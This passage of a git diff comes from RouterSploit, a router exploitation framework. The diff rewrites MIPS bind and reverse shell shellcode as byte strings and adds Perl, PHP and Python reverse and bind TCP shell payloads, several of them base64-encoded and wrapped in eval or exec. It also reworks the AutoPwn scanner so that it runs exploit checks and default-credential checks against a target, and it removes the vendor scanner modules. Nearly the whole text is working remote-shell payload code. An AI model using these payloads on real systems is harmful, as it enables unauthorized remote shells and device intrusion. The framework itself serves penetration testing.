utils.convert_port(self.rport) + return ( - "\xe0\xff\xbd\x27" + # addiu sp,sp,-32 - "\xfd\xff\x0e\x24" + # li t6,-3 - "\x27\x20\xc0\x01" + # nor a0,t6,zero - "\x27\x28\xc0\x01" + # nor a1,t6,zero - "\xff\xff\x06\x28" + # slti a2,zero,-1 - "\x57\x10\x02\x24" + # li v0,4183 ( __NR_socket ) - "\x0c\x01\x01\x01" + # syscall + b"\xe0\xff\xbd\x27" + # addiu sp,sp,-32 + b"\xfd\xff\x0e\x24" + # li t6,-3 + b"\x27\x20\xc0\x01" + # nor a0,t6,zero + b"\x27\x28\xc0\x01" + # nor a1,t6,zero + b"\xff\xff\x06\x28" + # slti a2,zero,-1 + b"\x57\x10\x02\x24" + # li v0,4183 ( __NR_socket ) + b"\x0c\x01\x01\x01" + # syscall - "\xff\xff\x50\x30" + # andi s0,v0,0xffff - "\xef\xff\x0e\x24" + # li t6,-17 ; t6: 0xffffffef - "\x27\x70\xc0\x01" + # nor t6,t6,zero ; t6: 0x10 (16) - bind_port + "\x0d\x24" + # li t5,0xFFFF (port) ; t5: 0x5c11 (0x115c == 4444 (default LPORT)) - "\x04\x68\xcd\x01" + # sllv t5,t5,t6 ; t5: 0x5c110000 - "\xfd\xff\x0e\x24" + # li t6,-3 ; t6: -3 - "\x27\x70\xc0\x01" + # nor t6,t6,zero ; t6: 0x2 - "\x25\x68\xae\x01" + # or t5,t5,t6 ; t5: 0x5c110002 - "\xe0\xff\xad\xaf" + # sw t5,-32(sp) - "\xe4\xff\xa0\xaf" + # sw zero,-28(sp) - "\xe8\xff\xa0\xaf" + # sw zero,-24(sp) - "\xec\xff\xa0\xaf" + # sw zero,-20(sp) - "\x25\x20\x10\x02" + # or a0,s0,s0 - "\xef\xff\x0e\x24" + # li t6,-17 - "\x27\x30\xc0\x01" + # nor a2,t6,zero - "\xe0\xff\xa5\x23" + # addi a1,sp,-32 - "\x49\x10\x02\x24" + # li v0,4169 ( __NR_bind )A - "\x0c\x01\x01\x01" + # syscall + b"\xff\xff\x50\x30" + # andi s0,v0,0xffff + b"\xef\xff\x0e\x24" + # li t6,-17 ; t6: 0xffffffef + b"\x27\x70\xc0\x01" + # nor t6,t6,zero ; t6: 0x10 (16) + bind_port + b"\x0d\x24" + # li t5,0xFFFF (port) ; t5: 0x5c11 (0x115c == 4444 (default LPORT)) + b"\x04\x68\xcd\x01" + # sllv t5,t5,t6 ; t5: 0x5c110000 + b"\xfd\xff\x0e\x24" + # li t6,-3 ; t6: -3 + b"\x27\x70\xc0\x01" + # nor t6,t6,zero ; t6: 0x2 + b"\x25\x68\xae\x01" + # or t5,t5,t6 ; t5: 0x5c110002 + b"\xe0\xff\xad\xaf" + # sw t5,-32(sp) + b"\xe4\xff\xa0\xaf" + # sw zero,-28(sp) + b"\xe8\xff\xa0\xaf" + # sw zero,-24(sp) + b"\xec\xff\xa0\xaf" + # sw zero,-20(sp) + b"\x25\x20\x10\x02" + # or a0,s0,s0 + b"\xef\xff\x0e\x24" + # li t6,-17 + b"\x27\x30\xc0\x01" + # nor a2,t6,zero + b"\xe0\xff\xa5\x23" + # addi a1,sp,-32 + b"\x49\x10\x02\x24" + # li v0,4169 ( __NR_bind )A + b"\x0c\x01\x01\x01" + # syscall - "\x25\x20\x10\x02" + # or a0,s0,s0 - "\x01\x01\x05\x24" + # li a1,257 - "\x4e\x10\x02\x24" + # li v0,4174 ( __NR_listen ) - "\x0c\x01\x01\x01" + # syscall + b"\x25\x20\x10\x02" + # or a0,s0,s0 + b"\x01\x01\x05\x24" + # li a1,257 + b"\x4e\x10\x02\x24" + # li v0,4174 ( __NR_listen ) + b"\x0c\x01\x01\x01" + # syscall - "\x25\x20\x10\x02" + # or a0,s0,s0 - "\xff\xff\x05\x28" + # slti a1,zero,-1 - "\xff\xff\x06\x28" + # slti a2,zero,-1 - "\x48\x10\x02\x24" + # li v0,4168 ( __NR_accept ) - "\x0c\x01\x01\x01" + # syscall + b"\x25\x20\x10\x02" + # or a0,s0,s0 + b"\xff\xff\x05\x28" + # slti a1,zero,-1 + b"\xff\xff\x06\x28" + # slti a2,zero,-1 + b"\x48\x10\x02\x24" + # li v0,4168 ( __NR_accept ) + b"\x0c\x01\x01\x01" + # syscall - "\xff\xff\xa2\xaf" + # sw v0,-1(sp) # socket - "\xfd\xff\x11\x24" + # li s1,-3 - "\x27\x88\x20\x02" + # nor s1,s1,zero - "\xff\xff\xa4\x8f" + # lw a0,-1(sp) - "\x21\x28\x20\x02" + # move a1,s1 # dup2_loop - "\xdf\x0f\x02\x24" + # li v0,4063 ( __NR_dup2 ) - "\x0c\x01\x01\x01" + # syscall 0x40404 - "\xff\xff\x10\x24" + # li s0,-1 - "\xff\xff\x31\x22" + # addi s1,s1,-1 - "\xfa\xff\x30\x16" + # bne s1,s0 + b"\xff\xff\xa2\xaf" + # sw v0,-1(sp) # socket + b"\xfd\xff\x11\x24" + # li s1,-3 + b"\x27\x88\x20\x02" + # nor s1,s1,zero + b"\xff\xff\xa4\x8f" + # lw a0,-1(sp) + b"\x21\x28\x20\x02" + # move a1,s1 # dup2_loop + b"\xdf\x0f\x02\x24" + # li v0,4063 ( __NR_dup2 ) + b"\x0c\x01\x01\x01" + # syscall 0x40404 + b"\xff\xff\x10\x24" + # li s0,-1 + b"\xff\xff\x31\x22" + # addi s1,s1,-1 + b"\xfa\xff\x30\x16" + # bne s1,s0 - "\xff\xff\x06\x28" + # slti a2,zero,-1 - "\x62\x69\x0f\x3c" + # lui t7,0x2f2f "bi" - "\x2f\x2f\xef\x35" + # ori t7,t7,0x6269 "//" - "\xec\xff\xaf\xaf" + # sw t7,-20(sp) - "\x73\x68\x0e\x3c" + # lui t6,0x6e2f "sh" - "\x6e\x2f\xce\x35" + # ori t6,t6,0x7368 "n/" - "\xf0\xff\xae\xaf" + # sw t6,-16(sp) - "\xf4\xff\xa0\xaf" + # sw zero,-12(sp) - "\xec\xff\xa4\x27" + # addiu a0,sp,-20 - "\xf8\xff\xa4\xaf" + # sw a0,-8(sp) - "\xfc\xff\xa0\xaf" + # sw zero,-4(sp) - "\xf8\xff\xa5\x27" + # addiu a1,sp,-8 - "\xab\x0f\x02\x24" + # li v0,4011 ( __NR_execve ) - "\x0c\x01\x01\x01" # syscall 0x40404 + b"\xff\xff\x06\x28" + # slti a2,zero,-1 + b"\x62\x69\x0f\x3c" + # lui t7,0x2f2f "bi" + b"\x2f\x2f\xef\x35" + # ori t7,t7,0x6269 "//" + b"\xec\xff\xaf\xaf" + # sw t7,-20(sp) + b"\x73\x68\x0e\x3c" + # lui t6,0x6e2f "sh" + b"\x6e\x2f\xce\x35" + # ori t6,t6,0x7368 "n/" + b"\xf0\xff\xae\xaf" + # sw t6,-16(sp) + b"\xf4\xff\xa0\xaf" + # sw zero,-12(sp) + b"\xec\xff\xa4\x27" + # addiu a0,sp,-20 + b"\xf8\xff\xa4\xaf" + # sw a0,-8(sp) + b"\xfc\xff\xa0\xaf" + # sw zero,-4(sp) + b"\xf8\xff\xa5\x27" + # addiu a1,sp,-8 + b"\xab\x0f\x02\x24" + # li v0,4011 ( __NR_execve ) + b"\x0c\x01\x01\x01" # syscall 0x40404 ) diff --git a/routersploit/modules/payloads/mipsle/reverse_tcp.py b/routersploit/modules/payloads/mipsle/reverse_tcp.py index 05702bfff..4284f9225 100644 --- a/routersploit/modules/payloads/mipsle/reverse_tcp.py +++ b/routersploit/modules/payloads/mipsle/reverse_tcp.py @@ -1,5 +1,5 @@ -from routersploit import validators -from routersploit.payloads import ( +from routersploit.core.exploit import * +from routersploit.core.exploit.payloads import ( ArchitectureSpecificPayload, Architectures, ReverseTCPPayloadMixin, @@ -8,69 +8,67 @@ class Exploit(ReverseTCPPayloadMixin, ArchitectureSpecificPayload): __info__ = { - 'name': 'MIPSLE Reverse TCP', - 'authors': [ - ], - 'description': '', - 'references': [ - ], - 'devices': [ + "name": "MIPSLE Reverse TCP", + "description": "Creates interactive tcp reverse shell for MIPSLE architecture.", + "authors": [ + "Marcin Bury " # routersploit module ], } architecture = Architectures.MIPSLE def generate(self): - reverse_ip = validators.convert_ip(self.lhost) - reverse_port = validators.convert_port(self.lport) + reverse_ip = utils.convert_ip(self.lhost) + reverse_port = utils.convert_port(self.lport) + return ( - "\xff\xff\x04\x28" + # slti a0,zero,-1 - "\xa6\x0f\x02\x24" + # li v0,4006 - "\x0c\x09\x09\x01" + # syscall 0x42424 - "\x11\x11\x04\x28" + # slti a0,zero,4369 - "\xa6\x0f\x02\x24" + # li v0,4006 - "\x0c\x09\x09\x01" + # syscall 0x42424 - "\xfd\xff\x0c\x24" + # li t4,-3 - "\x27\x20\x80\x01" + # nor a0,t4,zero - "\xa6\x0f\x02\x24" + # li v0,4006 - "\x0c\x09\x09\x01" + # syscall 0x42424 - "\xfd\xff\x0c\x24" + # li t4,-3 - "\x27\x20\x80\x01" + # nor a0,t4,zero - "\x27\x28\x80\x01" + # nor a1,t4,zero - "\xff\xff\x06\x28" + # slti a2,zero,-1 - "\x57\x10\x02\x24" + # li v0,4183 - "\x0c\x09\x09\x01" + # syscall 0x42424 - "\xff\xff\x44\x30" + # andi a0,v0,0xffff - "\xc9\x0f\x02\x24" + # li v0,4041 - "\x0c\x09\x09\x01" + # syscall 0x42424 - "\xc9\x0f\x02\x24" + # li v0,4041 - "\x0c\x09\x09\x01" + # syscall 0x42424 - reverse_port + "\x05\x3c" + # "\x7a\x69" lui a1,0x697a - "\x02\x00\xa5\x34" + # ori a1,a1,0x2 - "\xf8\xff\xa5\xaf" + # sw a1,-8(sp) - reverse_ip[2:] + "\x05\x3c" + # "\x00\x01" lui a1,0x100 - reverse_ip[:2] + "\xa5\x34" + # "\x7f\x00" ori a1,a1,0x7f - "\xfc\xff\xa5\xaf" + # sw a1,-4(sp) - "\xf8\xff\xa5\x23" + # addi a1,sp,-8 - "\xef\xff\x0c\x24" + # li t4,-17 - "\x27\x30\x80\x01" + # nor a2,t4,zero - "\x4a\x10\x02\x24" + # li v0,4170 - "\x0c\x09\x09\x01" + # syscall 0x42424 - "\x62\x69\x08\x3c" + # lui t0,0x6962 - "\x2f\x2f\x08\x35" + # ori t0,t0,0x2f2f - "\xec\xff\xa8\xaf" + # sw t0,-20(sp) - "\x73\x68\x08\x3c" + # lui t0,0x6873 - "\x6e\x2f\x08\x35" + # ori t0,t0,0x2f6e - "\xf0\xff\xa8\xaf" + # sw t0,-16(sp) - "\xff\xff\x07\x28" + # slti a3,zero,-1 - "\xf4\xff\xa7\xaf" + # sw a3,-12(sp) - "\xfc\xff\xa7\xaf" + # sw a3,-4(sp) - "\xec\xff\xa4\x23" + # addi a0,sp,-20 - "\xec\xff\xa8\x23" + # addi t0,sp,-20 - "\xf8\xff\xa8\xaf" + # sw t0,-8(sp) - "\xf8\xff\xa5\x23" + # addi a1,sp,-8 - "\xec\xff\xbd\x27" + # addiu sp,sp,-20 - "\xff\xff\x06\x28" + # slti a2,zero,-1 - "\xab\x0f\x02\x24" + # li v0,4011 - "\x0c\x09\x09\x01" # syscall 0x42424 + b"\xff\xff\x04\x28" + # slti a0,zero,-1 + b"\xa6\x0f\x02\x24" + # li v0,4006 + b"\x0c\x09\x09\x01" + # syscall 0x42424 + b"\x11\x11\x04\x28" + # slti a0,zero,4369 + b"\xa6\x0f\x02\x24" + # li v0,4006 + b"\x0c\x09\x09\x01" + # syscall 0x42424 + b"\xfd\xff\x0c\x24" + # li t4,-3 + b"\x27\x20\x80\x01" + # nor a0,t4,zero + b"\xa6\x0f\x02\x24" + # li v0,4006 + b"\x0c\x09\x09\x01" + # syscall 0x42424 + b"\xfd\xff\x0c\x24" + # li t4,-3 + b"\x27\x20\x80\x01" + # nor a0,t4,zero + b"\x27\x28\x80\x01" + # nor a1,t4,zero + b"\xff\xff\x06\x28" + # slti a2,zero,-1 + b"\x57\x10\x02\x24" + # li v0,4183 + b"\x0c\x09\x09\x01" + # syscall 0x42424 + b"\xff\xff\x44\x30" + # andi a0,v0,0xffff + b"\xc9\x0f\x02\x24" + # li v0,4041 + b"\x0c\x09\x09\x01" + # syscall 0x42424 + b"\xc9\x0f\x02\x24" + # li v0,4041 + b"\x0c\x09\x09\x01" + # syscall 0x42424 + reverse_port + b"\x05\x3c" + # "\x7a\x69" lui a1,0x697a + b"\x02\x00\xa5\x34" + # ori a1,a1,0x2 + b"\xf8\xff\xa5\xaf" + # sw a1,-8(sp) + reverse_ip[2:] + b"\x05\x3c" + # "\x00\x01" lui a1,0x100 + reverse_ip[:2] + b"\xa5\x34" + # "\x7f\x00" ori a1,a1,0x7f + b"\xfc\xff\xa5\xaf" + # sw a1,-4(sp) + b"\xf8\xff\xa5\x23" + # addi a1,sp,-8 + b"\xef\xff\x0c\x24" + # li t4,-17 + b"\x27\x30\x80\x01" + # nor a2,t4,zero + b"\x4a\x10\x02\x24" + # li v0,4170 + b"\x0c\x09\x09\x01" + # syscall 0x42424 + b"\x62\x69\x08\x3c" + # lui t0,0x6962 + b"\x2f\x2f\x08\x35" + # ori t0,t0,0x2f2f + b"\xec\xff\xa8\xaf" + # sw t0,-20(sp) + b"\x73\x68\x08\x3c" + # lui t0,0x6873 + b"\x6e\x2f\x08\x35" + # ori t0,t0,0x2f6e + b"\xf0\xff\xa8\xaf" + # sw t0,-16(sp) + b"\xff\xff\x07\x28" + # slti a3,zero,-1 + b"\xf4\xff\xa7\xaf" + # sw a3,-12(sp) + b"\xfc\xff\xa7\xaf" + # sw a3,-4(sp) + b"\xec\xff\xa4\x23" + # addi a0,sp,-20 + b"\xec\xff\xa8\x23" + # addi t0,sp,-20 + b"\xf8\xff\xa8\xaf" + # sw t0,-8(sp) + b"\xf8\xff\xa5\x23" + # addi a1,sp,-8 + b"\xec\xff\xbd\x27" + # addiu sp,sp,-20 + b"\xff\xff\x06\x28" + # slti a2,zero,-1 + b"\xab\x0f\x02\x24" + # li v0,4011 + b"\x0c\x09\x09\x01" # syscall 0x42424 ) diff --git a/routersploit/modules/payloads/perl/__init__.py b/routersploit/modules/payloads/perl/__init__.py new file mode 100644 index 000000000..e69de29bb diff --git a/routersploit/modules/payloads/perl/bind_tcp.py b/routersploit/modules/payloads/perl/bind_tcp.py new file mode 100644 index 000000000..405e9aae2 --- /dev/null +++ b/routersploit/modules/payloads/perl/bind_tcp.py @@ -0,0 +1,23 @@ +from routersploit.core.exploit import * +from routersploit.core.exploit.payloads import BindTCPPayloadMixin, GenericPayload + + +class Exploit(BindTCPPayloadMixin, GenericPayload): + __info__ = { + "name": "Perl Bind TCP", + "description": "Creates interactive tcp bind shell by using perl.", + "authors": ( + "Marcin Bury " # routersploit module + ), + } + + def generate(self): + payload = ( + "$p=fork();exit,if$p;foreach my $key(keys %ENV){" + + "if($ENV{$key}=~/(.*)/){$ENV{$key}=$1;}}$c=new IO::Socket::INET(LocalPort," + + str(self.rport) + + ",Reuse,1,Listen)->accept;$~->fdopen($c,w);STDIN->fdopen($c,r);while(<>){" + + "if($_=~ /(.*)/){system $1;}};" + ) + + return payload diff --git a/routersploit/modules/payloads/perl/reverse_tcp.py b/routersploit/modules/payloads/perl/reverse_tcp.py new file mode 100644 index 000000000..632c6c102 --- /dev/null +++ b/routersploit/modules/payloads/perl/reverse_tcp.py @@ -0,0 +1,24 @@ +from routersploit.core.exploit import * +from routersploit.core.exploit.payloads import GenericPayload, ReverseTCPPayloadMixin + + +class Exploit(ReverseTCPPayloadMixin, GenericPayload): + __info__ = { + "name": "Perl Reverse TCP", + "description": "Creates interactive tcp reverse shell by using perl.", + "authors": ( + "Marcin Bury " # routersploit module + ), + } + + def generate(self): + payload = ( + "$p=fork;exit,if($p);foreach my $key(keys %ENV){" + + "if($ENV{$key}=~/(.*)/){$ENV{$key}=$1;}}$c=new IO::Socket::INET(PeerAddr,\"" + + self.lhost + + ":" + + str(self.lport) + + "\");STDIN->fdopen($c,r);$~->fdopen($c,w);while(<>){if($_=~ /(.*)/){system $1;}};" + ) + + return payload diff --git a/routersploit/modules/payloads/php/__init__.py b/routersploit/modules/payloads/php/__init__.py new file mode 100644 index 000000000..e69de29bb diff --git a/routersploit/modules/payloads/php/reverse_tcp.py b/routersploit/modules/payloads/php/reverse_tcp.py new file mode 100644 index 000000000..30568c898 --- /dev/null +++ b/routersploit/modules/payloads/php/reverse_tcp.py @@ -0,0 +1,22 @@ +from base64 import b64encode +from routersploit.core.exploit import * +from routersploit.core.exploit.payloads import GenericPayload, ReverseTCPPayloadMixin + + +class Exploit(ReverseTCPPayloadMixin, GenericPayload): + __info__ = { + "name": "PHP Reverse TCP", + "description": "Creates interactive tcp reverse shell by using php.", + "authors": ( + "Marcin Bury " # routersploit module + ), + } + + def generate(self): + payload = ( + "$s=fsockopen(\"tcp://{}\",{});".format(self.lhost, self.lport) + + "while(!feof($s)){exec(fgets($s),$o);$o=implode(\"\\n\",$o);$o.=\"\\n\";fputs($s,$o);}" + ) + + encoded_payload = str(b64encode(bytes(payload, "utf-8")), "utf-8") + return "eval(base64_decode('{}'));".format(encoded_payload) diff --git a/routersploit/modules/payloads/python/__init__.py b/routersploit/modules/payloads/python/__init__.py new file mode 100644 index 000000000..e69de29bb diff --git a/routersploit/modules/payloads/python/bind_tcp.py b/routersploit/modules/payloads/python/bind_tcp.py new file mode 100644 index 000000000..9f2fe1331 --- /dev/null +++ b/routersploit/modules/payloads/python/bind_tcp.py @@ -0,0 +1,31 @@ +from base64 import b64encode +from routersploit.core.exploit import * +from routersploit.core.exploit.payloads import BindTCPPayloadMixin, GenericPayload + + +class Exploit(BindTCPPayloadMixin, GenericPayload): + __info__ = { + "name": "Python Bind TCP", + "description": "Creates interactive tcp bind shell by using python.", + "authors": ( + "Marcin Bury " # routersploit module + ), + } + + def generate(self): + payload = ( + "import socket,os\n" + + "so=socket.socket(socket.AF_INET,socket.SOCK_STREAM)\n" + + "so.bind(('0.0.0.0',{}))\n".format(self.rport) + + "so.listen(1)\n" + + "so,addr=so.accept()\n" + + "x=False\n" + + "while not x:\n" + + "\tdata=so.recv(1024)\n" + + "\tstdin,stdout,stderr,=os.popen3(data)\n" + + "\tstdout_value=stdout.read()+stderr.read()\n" + + "\tso.send(stdout_value)\n" + ) + + encoded_payload = str(b64encode(bytes(payload, "utf-8")), "utf-8") + return "exec('{}'.decode('base64'))".format(encoded_payload) diff --git a/routersploit/modules/payloads/python/reverse_tcp.py b/routersploit/modules/payloads/python/reverse_tcp.py new file mode 100644 index 000000000..5b52b30ee --- /dev/null +++ b/routersploit/modules/payloads/python/reverse_tcp.py @@ -0,0 +1,27 @@ +from base64 import b64encode +from routersploit.core.exploit import * +from routersploit.core.exploit.payloads import GenericPayload, ReverseTCPPayloadMixin + + +class Exploit(ReverseTCPPayloadMixin, GenericPayload): + __info__ = { + "name": "Python Reverse TCP", + "description": "Creates interactive tcp reverse shell by using python.", + "authors": ( + "Marcin Bury " # routersploit module + ), + } + + def generate(self): + payload = ( + "import socket,subprocess,os\n" + + "s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)\n" + + "s.connect(('{}',{}))\n".format(self.lhost, self.lport) + + "os.dup2(s.fileno(),0)\n" + + "os.dup2(s.fileno(),1)\n" + + "os.dup2(s.fileno(),2)\n" + + "p=subprocess.call([\"/bin/sh\",\"-i\"])" + ) + + encoded_payload = str(b64encode(bytes(payload, "utf-8")), "utf-8") + return "exec('{}'.decode('base64'))".format(encoded_payload) diff --git a/routersploit/modules/scanners/2wire_scan.py b/routersploit/modules/scanners/2wire_scan.py deleted file mode 100755 index fb462c97e..000000000 --- a/routersploit/modules/scanners/2wire_scan.py +++ /dev/null @@ -1,23 +0,0 @@ -from __future__ import absolute_import - -from .autopwn import Exploit as BaseScanner - - -class Exploit(BaseScanner): - """ - Scanner implementation for 2wire vulnerabilities. - """ - __info__ = { - 'name': '2wire Scanner', - 'description': 'Scanner module for 2wire devices', - 'authors': [ - 'Mariusz Kupidura ', # routersploit module - ], - 'references': ( - '', - ), - 'devices': ( - '2wire', - ), - } - modules = ['routers/2wire', 'cameras/2wire', 'misc/2wire'] diff --git a/routersploit/modules/scanners/3com_scan.py b/routersploit/modules/scanners/3com_scan.py deleted file mode 100755 index 84f763ba9..000000000 --- a/routersploit/modules/scanners/3com_scan.py +++ /dev/null @@ -1,23 +0,0 @@ -from __future__ import absolute_import - -from .autopwn import Exploit as BaseScanner - - -class Exploit(BaseScanner): - """ - Scanner implementation for 3com vulnerabilities. - """ - __info__ = { - 'name': '3com Scanner', - 'description': 'Scanner module for 3com devices', - 'authors': [ - 'Mariusz Kupidura ', # routersploit module - ], - 'references': ( - '', - ), - 'devices': ( - '3com', - ), - } - modules = ['routers/3com', 'cameras/3com', 'misc/3com'] diff --git a/routersploit/modules/scanners/asmax_scan.py b/routersploit/modules/scanners/asmax_scan.py deleted file mode 100755 index 759cd6955..000000000 --- a/routersploit/modules/scanners/asmax_scan.py +++ /dev/null @@ -1,23 +0,0 @@ -from __future__ import absolute_import - -from .autopwn import Exploit as BaseScanner - - -class Exploit(BaseScanner): - """ - Scanner implementation for Asmax vulnerabilities. - """ - __info__ = { - 'name': 'Asmax Scanner', - 'description': 'Scanner module for Asmax devices', - 'authors': [ - 'Mariusz Kupidura ', # routersploit module - ], - 'references': ( - '', - ), - 'devices': ( - 'Asmax', - ), - } - modules = ['routers/asmax', 'cameras/asmax', 'misc/asmax'] diff --git a/routersploit/modules/scanners/asus_scan.py b/routersploit/modules/scanners/asus_scan.py deleted file mode 100755 index a48a2c70c..000000000 --- a/routersploit/modules/scanners/asus_scan.py +++ /dev/null @@ -1,23 +0,0 @@ -from __future__ import absolute_import - -from .autopwn import Exploit as BaseScanner - - -class Exploit(BaseScanner): - """ - Scanner implementation for Asus vulnerabilities. - """ - __info__ = { - 'name': 'Asus Scanner', - 'description': 'Scanner module for Asus devices', - 'authors': [ - 'Mariusz Kupidura ', # routersploit module - ], - 'references': ( - '', - ), - 'devices': ( - 'Asus', - ), - } - modules = ['routers/asus', 'cameras/asus', 'misc/asus'] diff --git a/routersploit/modules/scanners/autopwn.py b/routersploit/modules/scanners/autopwn.py index 82d25c842..684f3571f 100644 --- a/routersploit/modules/scanners/autopwn.py +++ b/routersploit/modules/scanners/autopwn.py @@ -1,83 +1,187 @@ from os import path +from routersploit.core.exploit import * +from routersploit.core.exploit.exploit import Protocol +from routersploit.core.http.http_client import HTTPClient +from routersploit.core.ftp.ftp_client import FTPClient +from routersploit.core.ssh.ssh_client import SSHClient +from routersploit.core.telnet.telnet_client import TelnetClient -from routersploit import ( - exploits, - print_error, - print_success, - print_status, - print_info, - utils, - threads, -) - - -class Exploit(exploits.Exploit): - """ - Scanner implementation for all vulnerabilities. - """ + +class Exploit(Exploit): __info__ = { - 'name': 'AutoPwn', - 'description': 'Scanner module for all vulnerabilities.', - 'authors': [ - 'Marcin Bury ', # routersploit module - ], - 'references': ( - '', + "name": "AutoPwn", + "description": "Scanner module for all vulnerabilities.", + "authors": ( + "Marcin Bury ", # routersploit module ), - 'devices': ( - 'Multi', + "devices": ( + "Multi", ), } - modules = ['routers', 'cameras', 'misc'] - target = exploits.Option('', 'Target IP address e.g. 192.168.1.1') # target address - port = exploits.Option(80, 'Target port') # default port - threads = exploits.Option(8, "Number of threads") + modules = ["generic", "routers", "cameras", "misc"] + + target = OptIP("", "Target IPv4 or IPv6 address") + + http_port = OptPort(80, "Target Web Interface Port") + http_ssl = OptBool("false", "HTTPS enabled: true/false") + + ftp_port = OptPort(21, "Target FTP port (default: 21)") + ftp_ssl = OptBool("false", "FTPS enabled: true/false") + + ssh_port = OptPort(22, "Target SSH port (default: 22)") + telnet_port = OptPort(23, "Target Telnet port (default: 23)") + + threads = OptInteger(8, "Number of threads") def __init__(self): self.vulnerabilities = [] + self.creds = [] self.not_verified = [] - self._exploits_directories = [path.join(utils.EXPLOITS_DIR, module) for module in self.modules] + self._exploits_directories = [path.join("routersploit/modules/exploits/", module) for module in self.modules] + self._creds_directories = [path.join("routersploit/modules/creds/", module) for module in self.modules] def run(self): self.vulnerabilities = [] + self.creds = [] self.not_verified = [] - with threads.ThreadPoolExecutor(self.threads) as executor: - for directory in self._exploits_directories: - for exploit in utils.iter_modules(directory): - executor.submit(self.target_function, exploit) + # vulnerabilities + print_info() + print_info("\033[94m[*]\033[0m", "Starting vulnerablity check...".format(self.target)) + + modules = [] + for directory in self._exploits_directories: + for module in utils.iter_modules(directory): + modules.append(module) + + data = LockedIterator(modules) + self.run_threads(self.threads, self.exploits_target_function, data) + # default creds + print_info() + print_info("\033[94m[*]\033[0m", "{} Starting default credentials check...".format(self.target)) + modules = [] + for directory in self._creds_directories: + for module in utils.iter_modules(directory): + modules.append(module) + + data = LockedIterator(modules) + self.run_threads(self.threads, self.creds_target_function, data) + + # results: print_info() if self.not_verified: - print_status("Could not verify exploitability:") + print_info("\033[94m[*]\033[0m", "{} Could not verify exploitability:".format(self.target)) for v in self.not_verified: - print_info(" - {}".format(v)) + print_info(" - {}:{} {} {}".format(*v)) + print_info() - print_info() if self.vulnerabilities: - print_success("Device is vulnerable:") - for v in self.vulnerabilities: - print_info(" - {}".format(v)) + print_info("\033[92m[+]\033[0m", "{} Device is vulnerable:".format(self.target)) + headers = ("Target", "Port", "Service", "Exploit") + print_table(headers, *self.vulnerabilities) print_info() else: - print_error("Could not confirm any vulnerablity\n") + print_info("\033[91m[-]\033[0m", "{} Could not confirm any vulnerablity\n".format(self.target)) - def check(self): - raise NotImplementedError("Check method is not available") - - def target_function(self, exploit): - exploit = exploit() - exploit.target = self.target - exploit.port = self.port + if self.creds: + print_info("\033[92m[+]\033[0m", "{} Found default credentials:".format(self.target)) + headers = ("Target", "Port", "Service", "Username", "Password") + print_table(headers, *self.creds) + print_info() + else: + print_info("\033[91m[-]\033[0m", "{} Could not find default credentials".format(self.target)) - response = exploit.check() + def exploits_target_function(self, running, data): + while running.is_set(): + try: + module = data.next() + exploit = module() + except StopIteration: + break + else: + exploit.target = self.target + + if exploit.target_protocol == Protocol.HTTP: + exploit.port = self.http_port + if self.http_ssl: + exploit.ssl = "true" + exploit.target_protocol = Protocol.HTTPS + + elif exploit.target_protocol is Protocol.FTP: + exploit.port = self.ftp_port + if self.ftp_ssl: + exploit.ssl = "true" + exploit.target_protocol = Protocol.FTPS + + elif exploit.target_protocol is Protocol.TELNET: + exploit.port = self.telnet_port + + # elif exploit.target_protocol not in ["tcp", "udp"]: + # exploit.target_protocol = "custom" + + response = exploit.check() + + if response is True: + print_info("\033[92m[+]\033[0m", "{}:{} {} {} is vulnerable".format( + exploit.target, exploit.port, exploit.target_protocol, exploit)) + self.vulnerabilities.append((exploit.target, exploit.port, exploit.target_protocol, str(exploit))) + elif response is False: + print_info("\033[91m[-]\033[0m", "{}:{} {} {} is not vulnerable".format( + exploit.target, exploit.port, exploit.target_protocol, exploit)) + else: + print_info("\033[94m[*]\033[0m", "{}:{} {} {} Could not be verified".format( + exploit.target, exploit.port, exploit.target_protocol, exploit)) + self.not_verified.append((exploit.target, exploit.port, exploit.target_protocol, str(exploit))) - if response is True: - print_success("{} is vulnerable".format(exploit)) - self.vulnerabilities.append(exploit) - elif response is False: - print_error("{} is not vulnerable".format(exploit)) - else: - print_status("{} could not be verified".format(exploit)) - self.not_verified.append(exploit) + def creds_target_function(self, running, data): + while running.is_set(): + try: + module = data.next() + exploit = module() + + generic = exploit.__module__.startswith("routersploit.modules.creds.generic") and exploit.__module__.endswith("default") + except StopIteration: + break + else: + exploit.target = self.target + exploit.verbosity = "false" + exploit.stop_on_success = "false" + exploit.threads = self.threads + + if exploit.target_protocol == Protocol.HTTP: + exploit.port = self.http_port + if self.http_ssl: + exploit.ssl = "true" + exploit.target_protocol = Protocol.HTTPS + + elif generic: + if exploit.target_protocol is Protocol.HTTP: + exploit.port = self.http_port + if self.http_ssl: + exploit.ssl = "true" + exploit.target_protocol = Protocol.HTTPS + elif exploit.target_protocol == Protocol.SSH: + exploit.port = self.ssh_port + elif exploit.target_protocol == Protocol.FTP: + exploit.port = self.ftp_port + if self.ftp_ssl: + exploit.ssl = "true" + exploit.target_protocol = Protocol.FTPS + + elif exploit.target_protocol == Protocol.TELNET: + exploit.port = self.telnet_port + else: + continue + + response = exploit.check_default() + if response: + print_info("\033[92m[+]\033[0m", "{}:{} {} {} is vulnerable".format( + exploit.target, exploit.port, exploit.target_protocol, exploit)) + + for creds in response: + self.creds.append(creds) + else: + print_info("\033[91m[-]\033[0m", "{}:{} {} {} is not vulnerable".format( + exploit.target, exploit.port, exploit.target_protocol, exploit)) diff --git a/routersploit/modules/scanners/belkin_scan.py b/routersploit/modules/scanners/belkin_scan.py deleted file mode 100755 index 82da16eb4..000000000 --- a/routersploit/modules/scanners/belkin_scan.py +++ /dev/null @@ -1,23 +0,0 @@ -from __future__ import absolute_import - -from .autopwn import Exploit as BaseScanner - - -class Exploit(BaseScanner): - """ - Scanner implementation for Belkin vulnerabilities. - """ - __info__ = { - 'name': 'Belkin Scanner', - 'description': 'Scanner module for Belkin devices', - 'authors': [ - 'Mariusz Kupidura ', # routersploit module - ], - 'references': ( - '', - ), - 'devices': ( - 'Belkin', - ), - } - modules = ['routers/belkin', 'cameras/belkin', 'misc/belkin'] diff --git a/routersploit/modules/scanners/bhu_scan.py b/routersploit/modules/scanners/bhu_scan.py deleted file mode 100644 index 3ee5ccb8b..000000000 --- a/routersploit/modules/scanners/bhu_scan.py +++ /dev/null @@ -1,23 +0,0 @@ -from __future__ import absolute_import - -from .autopwn import Exploit as BaseScanner - - -class Exploit(BaseScanner): - - """Scanner implementation for BHU vulnerabilities.""" - - __info__ = { - 'name': 'BHU Scanner', - 'description': 'Scanner module for BHU devices', - 'authors': [ - 'Tao "depierre" Sauvage', 